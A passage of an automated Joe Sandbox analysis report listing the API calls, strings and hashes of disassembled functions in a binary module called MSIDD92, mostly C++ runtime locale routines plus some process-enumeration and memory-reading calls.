                                                                      • Opcode ID: ec3c593fdfb286ff9e2a71b9f40e830ed91067ab712e54aa934b74e2ab4a918b
                                                                      • Instruction ID: 9c6901155f38c708b7c40acc800ea31da0b3e1a61ed98d022c41042b11bc72f9
                                                                      • Opcode Fuzzy Hash: ec3c593fdfb286ff9e2a71b9f40e830ed91067ab712e54aa934b74e2ab4a918b
                                                                      • Instruction Fuzzy Hash: 00C1707254020AAFDF18EF98D9A5DFA7FADEB09318F184519FA42E7251D630DA00CB70
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D959E9
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 80c3096b1246641050e0026237c9803415fdbd4f81145507e2ddaeea18952fad
                                                                      • Instruction ID: 29bb4728243376cd4ccd96f7e187554da74f72bc94d4abb152b2235875f002d3
                                                                      • Opcode Fuzzy Hash: 80c3096b1246641050e0026237c9803415fdbd4f81145507e2ddaeea18952fad
                                                                      • Instruction Fuzzy Hash: CEC1A576500609AFDF1ADF98E999EFB3BB8EB05304F144529FA42A7259D631DA00CB70
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D90C2B
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 6566fe9206c1bbe492efa417b82d520f6416d3054eaf21c1e1d62cdaaef7c3c0
                                                                      • Instruction ID: ba8c12d0d61528c5a1fe20206a8ef9a8e9aae0c421b19a6979c5d20f1295830c
                                                                      • Opcode Fuzzy Hash: 6566fe9206c1bbe492efa417b82d520f6416d3054eaf21c1e1d62cdaaef7c3c0
                                                                      • Instruction Fuzzy Hash: 2EC15D7650010AAFDF28DFA8D995DFF7FA9EF09300F18451AFA46A6251D630DA14CB70
                                                                      APIs
                                                                        • Part of subcall function 00D76090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00D760F4
                                                                        • Part of subcall function 00D76090: GetLastError.KERNEL32 ref: 00D76190
                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00D76632
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00D7668B
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00D76712
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00D767F6
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00D7686E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00D768C9
                                                                      • FreeLibrary.KERNEL32(?,?,00000000), ref: 00D7691E
                                                                      Strings
                                                                      • NtQueryInformationProcess, xrefs: 00D7662C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                      • String ID: NtQueryInformationProcess
                                                                      • API String ID: 253270903-2781105232
                                                                      • Opcode ID: 3f9d12185af7e02b5d95d4abc29c1e8291cfa18127a54cb7077edb6c12b6e231
                                                                      • Instruction ID: 83d0d0e63580b0007d37b1d87bafa2db9154ccb87b8078f3ae480536c4f0a3e1
                                                                      • Opcode Fuzzy Hash: 3f9d12185af7e02b5d95d4abc29c1e8291cfa18127a54cb7077edb6c12b6e231
                                                                      • Instruction Fuzzy Hash: 60B17F70D10749DADB20CF64C9487AEBBF0EF48308F14465EE449A7690E7B5A6C8CBA1
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D8D498
                                                                      • _Maklocstr.LIBCPMT ref: 00D8D501
                                                                      • _Maklocstr.LIBCPMT ref: 00D8D513
                                                                      • _Maklocchr.LIBCPMT ref: 00D8D52B
                                                                      • _Maklocchr.LIBCPMT ref: 00D8D53B
                                                                      • _Getvals.LIBCPMT ref: 00D8D55D
                                                                        • Part of subcall function 00D8708B: _Maklocchr.LIBCPMT ref: 00D870BA
                                                                        • Part of subcall function 00D8708B: _Maklocchr.LIBCPMT ref: 00D870D0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 3549167292-2658103896
                                                                      • Opcode ID: 20a7b2ee7f57c57d7d0b8657d10bfe86b1921a87c01123e538fbe72002c9f9b2
                                                                      • Instruction ID: f2463cf216cb4d818793f1c8913c3c98a54c4adc07fb4fee01f0ae5b58096296
                                                                      • Opcode Fuzzy Hash: 20a7b2ee7f57c57d7d0b8657d10bfe86b1921a87c01123e538fbe72002c9f9b2
                                                                      • Instruction Fuzzy Hash: C4216D71D00308AADF14FFA5D886B9E7BA8EF05710F10805AF9199F282EA70D504CBB1
                                                                      APIs
                                                                        • Part of subcall function 00D85C66: __EH_prolog3.LIBCMT ref: 00D85C6D
                                                                        • Part of subcall function 00D85C66: std::_Lockit::_Lockit.LIBCPMT ref: 00D85C78
                                                                        • Part of subcall function 00D85C66: std::locale::_Setgloballocale.LIBCPMT ref: 00D85C93
                                                                        • Part of subcall function 00D85C66: std::_Lockit::~_Lockit.LIBCPMT ref: 00D85CE6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7CA1A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7CA80
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7CB4F
                                                                        • Part of subcall function 00D845A7: __EH_prolog3.LIBCMT ref: 00D845AE
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7CC00
                                                                      • LocalFree.KERNEL32(?,?,?,00DCB6C9,00000000,00DCB6C9), ref: 00D7CD01
                                                                      • __cftoe.LIBCMT ref: 00D7CE5E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2085124900-1405518554
                                                                      • Opcode ID: 90187ab0d76e1251fe56d4916511727d68b20632b5df9c63155d3cc66f17244c
                                                                      • Instruction ID: 0fb0c04bf4667ebaaa121ecdd1af5ae49573e3be0176c05ff926bdd2a674490f
                                                                      • Opcode Fuzzy Hash: 90187ab0d76e1251fe56d4916511727d68b20632b5df9c63155d3cc66f17244c
                                                                      • Instruction Fuzzy Hash: 69128F71D11249DFDF11DFA8C845BAEBBB5EF08304F148169E859AB381E735AA04CBB1
                                                                      APIs
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00D9B34B
                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00D9B459
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00D9B5AB
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00D9B5C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2751267872-393685449
APIs
• LocalAlloc.KERNEL32(00000040,?), ref: 00D80322
• LocalAlloc.KERNEL32(00000040,?), ref: 00D80367
• ___std_exception_copy.LIBVCRUNTIME ref: 00D803DE
• LocalFree.KERNEL32(?), ref: 00D8041B
• LocalFree.KERNEL32(?,?,?,?,?,862265DA,862265DA,?,?), ref: 00D80546
Similarity
• API ID: Local$AllocFree$___std_exception_copy
• String ID: ios_base::failbit set$iostream
• API String ID: 2276494016-302468714
APIs
• #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00D72C43
• LocalFree.KERNEL32(?), ref: 00D72CA2
• LocalFree.KERNEL32(?), ref: 00D72D0C
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00D72E94
  • Part of subcall function 00D73D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00D73DA3
• LocalFree.KERNEL32(?), ref: 00D72E13
• LocalFree.KERNEL32(?), ref: 00D72E6B
Similarity
• API ID: Free$Local$Cert$#224CertificateContextNameString
• String ID: Jm
• API String ID: 2665452496-1413287597
APIs
• LocalAlloc.KERNEL32(00000040,00000044,862265DA,?,00000000), ref: 00D7BA8B
• std::_Lockit::_Lockit.LIBCPMT ref: 00D7BAC8
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7BB35
• __Getctype.LIBCPMT ref: 00D7BB7E
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7BBF2
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BCAF
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 3635123611-1405518554
APIs
• LocalAlloc.KERNEL32(00000040,00000018,862265DA,?,00000000,?,?,?,?,?,?,?,00000000,00DBABC5,000000FF), ref: 00D7C264
• std::_Lockit::_Lockit.LIBCPMT ref: 00D7C29E
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7C302
• __Getctype.LIBCPMT ref: 00D7C34B
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7C391
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C445
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 3635123611-1405518554
APIs
• GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00D974C9
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D97557
• __alloca_probe_16.LIBCMT ref: 00D97581
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D975C9
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D975E3
• __alloca_probe_16.LIBCMT ref: 00D97609
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D97646
• CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00D97663
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
• String ID:
• API String ID: 3603178046-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00D7C6DF,?,00000001,00000000,?,00000000,?,00D7C6DF,?), ref: 00D96F6C
• __alloca_probe_16.LIBCMT ref: 00D96F98
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F,?), ref: 00D96FD7
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F), ref: 00D96FF4
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F), ref: 00D97033
• __alloca_probe_16.LIBCMT ref: 00D97050
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F), ref: 00D97092
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F,?), ref: 00D970B5
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,862265DA,?,00000004), ref: 00D759AA
• LocalFree.KERNEL32(?), ref: 00D75ABB
• MoveFileW.KERNEL32(?,00000000), ref: 00D75D5B
• DeleteFileW.KERNEL32(?), ref: 00D75DA3
Similarity
• API ID: File$DeleteFreeLocalMoveNameTemp
• String ID: URL$url
• API String ID: 1622375482-346267919
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D76242
• CloseHandle.KERNEL32(00000000), ref: 00D76285
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00D762E1
• OpenProcess.KERNEL32(00000410,00000000,?), ref: 00D762FD
• CloseHandle.KERNEL32(00000000), ref: 00D76445
• Process32NextW.KERNEL32(?,0000022C), ref: 00D76463
• CloseHandle.KERNEL32(00000000), ref: 00D7648E
Similarity
• API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
• String ID:
• API String ID: 708755948-0
APIs
• LocalAlloc.KERNEL32(00000040,0000000C,862265DA,?,00000000,00000000,?,?,?,?,00000000,00DBB2D1,000000FF,?,00D7EBCA,00000000), ref: 00D7F624
• std::_Lockit::_Lockit.LIBCPMT ref: 00D7F65A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7F6BE
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7F77E
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D7F832
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2968629171-1405518554
APIs
• LocalAlloc.KERNEL32(00000040,00000008,862265DA,?,00000000,00000000,?,?,?,00000000,00DBB1DD,000000FF,?,00D7ED0A,00000000,?), ref: 00D7F3F4
• std::_Lockit::_Lockit.LIBCPMT ref: 00D7F42A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7F48E
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7F4FE
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D7F5B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2968629171-1405518554
                                                                      • Opcode ID: c6a7cf2dd53ae4b0de942658ab9aea831715612bf20aaef37bb749c5befc8445
                                                                      • Instruction ID: 6a210be46da8c6163b9ae1b2f0c8b4156ff37cf66e208676c0c17b713b2e418d
                                                                      • Opcode Fuzzy Hash: c6a7cf2dd53ae4b0de942658ab9aea831715612bf20aaef37bb749c5befc8445
                                                                      • Instruction Fuzzy Hash: CF616EB0D01389EBEF21DFA8D9447DEBBB4AF14314F288169E454AB381E7759A04CB71
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D98D67
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00D98D6F
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D98DF8
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00D98E23
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D98E78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 57241c85830b91409184901ed05893329a6650184baa0df219b1341f3df067e2
                                                                      • Instruction ID: db8b62200d0265f6c71219036f6cb843a62def7dfed378d5c01a802477d43eab
                                                                      • Opcode Fuzzy Hash: 57241c85830b91409184901ed05893329a6650184baa0df219b1341f3df067e2
                                                                      • Instruction Fuzzy Hash: 69418334A00208DFCF10DF68C894A9EBBA6EF45724F148555F9159B392DB32EE05DBB1
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,00DACA78,?,?,?,00000000,?,?,00DACCA2,00000021,FlsSetValue,00DC1E00,00DC1E08,?), ref: 00DACA2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3664257935-537541572
                                                                      • Opcode ID: ad4b2a6689da6347be50446559e19cd2731c90e791e35244e10469c56724fa53
                                                                      • Instruction ID: a9793ca493305b9d1789af03bfec6f6e160020689e8b986fd56e78397231f30f
                                                                      • Opcode Fuzzy Hash: ad4b2a6689da6347be50446559e19cd2731c90e791e35244e10469c56724fa53
                                                                      • Instruction Fuzzy Hash: 2A21D536A51315EBCB21DB65AC44AAA3759DB437B1F291321E956E73D0EA30ED00CAF0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8D8FD
                                                                      • ctype.LIBCPMT ref: 00D8D944
                                                                        • Part of subcall function 00D8D458: __Getctype.LIBCPMT ref: 00D8D467
                                                                        • Part of subcall function 00D879C9: __EH_prolog3.LIBCMT ref: 00D879D0
                                                                        • Part of subcall function 00D879C9: std::_Lockit::_Lockit.LIBCPMT ref: 00D879DA
                                                                        • Part of subcall function 00D879C9: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87A4B
                                                                        • Part of subcall function 00D87AF3: __EH_prolog3.LIBCMT ref: 00D87AFA
                                                                        • Part of subcall function 00D87AF3: std::_Lockit::_Lockit.LIBCPMT ref: 00D87B04
                                                                        • Part of subcall function 00D87AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87B75
                                                                        • Part of subcall function 00D87CB2: __EH_prolog3.LIBCMT ref: 00D87CB9
                                                                        • Part of subcall function 00D87CB2: std::_Lockit::_Lockit.LIBCPMT ref: 00D87CC3
                                                                        • Part of subcall function 00D87CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87D34
                                                                        • Part of subcall function 00D87C1D: __EH_prolog3.LIBCMT ref: 00D87C24
                                                                        • Part of subcall function 00D87C1D: std::_Lockit::_Lockit.LIBCPMT ref: 00D87C2E
                                                                        • Part of subcall function 00D87C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C9F
                                                                        • Part of subcall function 00D84403: __EH_prolog3.LIBCMT ref: 00D8440A
                                                                        • Part of subcall function 00D84403: std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                        • Part of subcall function 00D84403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • collate.LIBCPMT ref: 00D8DA78
                                                                      • numpunct.LIBCPMT ref: 00D8DCF2
                                                                        • Part of subcall function 00D8838F: __EH_prolog3.LIBCMT ref: 00D88396
                                                                        • Part of subcall function 00D880C5: __EH_prolog3.LIBCMT ref: 00D880CC
                                                                        • Part of subcall function 00D880C5: std::_Lockit::_Lockit.LIBCPMT ref: 00D880D6
                                                                        • Part of subcall function 00D880C5: std::_Lockit::~_Lockit.LIBCPMT ref: 00D88147
                                                                        • Part of subcall function 00D881EF: __EH_prolog3.LIBCMT ref: 00D881F6
                                                                        • Part of subcall function 00D881EF: std::_Lockit::_Lockit.LIBCPMT ref: 00D88200
                                                                        • Part of subcall function 00D881EF: std::_Lockit::~_Lockit.LIBCPMT ref: 00D88271
                                                                        • Part of subcall function 00D84403: Concurrency::cancel_current_task.LIBCPMT ref: 00D844C6
                                                                        • Part of subcall function 00D875B6: __EH_prolog3.LIBCMT ref: 00D875BD
                                                                        • Part of subcall function 00D875B6: std::_Lockit::_Lockit.LIBCPMT ref: 00D875C7
                                                                        • Part of subcall function 00D875B6: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87638
                                                                      • __Getcoll.LIBCPMT ref: 00D8DAB8
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                        • Part of subcall function 00D784C0: LocalAlloc.KERNEL32(00000040,00000000,00D9839D,00000000,862265DA,?,00000000,?,00000000,?,00DBCB8D,000000FF,?,00D717D5,00000000,00DBD3BA), ref: 00D784C6
                                                                      • codecvt.LIBCPMT ref: 00D8DDA3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                      • String ID:
                                                                      • API String ID: 613171289-0
                                                                      • Opcode ID: 7e5c29d102b5bd0b5ceaa4f9d47c33486ec91861d9ff0181b8b44f75c9c32c4b
                                                                      • Instruction ID: 668d9a8e42d1fcd53c3ddff0a036f8fd1fee6db06bb04ecf1b39025d5a455903
                                                                      • Opcode Fuzzy Hash: 7e5c29d102b5bd0b5ceaa4f9d47c33486ec91861d9ff0181b8b44f75c9c32c4b
                                                                      • Instruction Fuzzy Hash: FBE1A2B1800216ABDB11BF658C06ABF7BA6EF41360F15842EF859573D1EF718D109BB1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7B5ED
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      • LocalFree.KERNEL32 ref: 00D7B6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
